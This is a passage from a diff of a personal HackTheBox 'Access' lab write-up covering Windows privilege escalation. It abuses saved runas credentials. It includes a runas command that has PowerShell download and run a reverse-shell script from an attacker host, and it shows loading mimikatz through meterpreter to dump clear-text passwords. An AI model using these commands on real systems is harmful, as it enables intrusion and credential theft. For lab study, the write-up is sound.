gabriele-annese/-computer-science-Notes/CyberSecurity/CTF/HackTheBox/AD/Access.md

 # Privilege Escalation

-under the `Public` desktop there is the `ZKAccess3.5 Security System.lnk` this file execute as `ACCESS\Administrator` the `C:\ZKTeco\ZKAccess3.5\Access.exe` file
+Under the `Public` desktop there is the `ZKAccess3.5 Security System.lnk` file.
+This file execute as `ACCESS\Administrator` the `C:\ZKTeco\ZKAccess3.5\Access.exe` file using the `runas` with `/savecred` flag

 ![[Pasted image 20250616224559.png]]

-the `runas` executable store the credential under the `Windows Crendential` manager and we can view with the command `cmdkey /list` [more info here](https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/StoredCredentialsRunas.md)
+Since the **.lnk** file use `/savecred` flag the `runas` executable store the credential under the `Windows Crendential` manager and we can view with the command `cmdkey /list` [more info here](https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/StoredCredentialsRunas.md)

-Now using `web_delivery` module from metasploit this module  generate a powershell script i have saved this in reverse.ps1 file and i start the `http.server` module.
-From telnet session i have run this command with `runas` and `/savecred` flag to execute my `meterpreter` session
+Now  i have used the `web_delivery` module from metasploit to generate a powershell script for a reverse shell.
+I took this script and i saved in a reverse.ps1 file.
+I started the `http.server` module on my kali machine and from telnet session i have run this command with `runas` and `/savecred` flag to execute my `meterpreter` session as `ACCESS\Administrator` account

 ```bash
 runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.16.48:8000/reverse.ps1')"
 ```

-Now with meterpreter shell now is too easy get all clear text password stored.
+Now with meterpreter session is too easy get all clear text password stored.

-Fist we need to load the kiwi module (mimikatz)
+Fist all we need to load the kiwi module (mimikatz)
 ```bash
 load kiwi
 ```

-mimikatz to work need the `SYSTEM` account session.
+to work mimikatz need the `SYSTEM` account session.
 To do this we can run `ps` command and `migrate` to the process that is running with the `SYSTEM` account

 ```bash
 migrate 408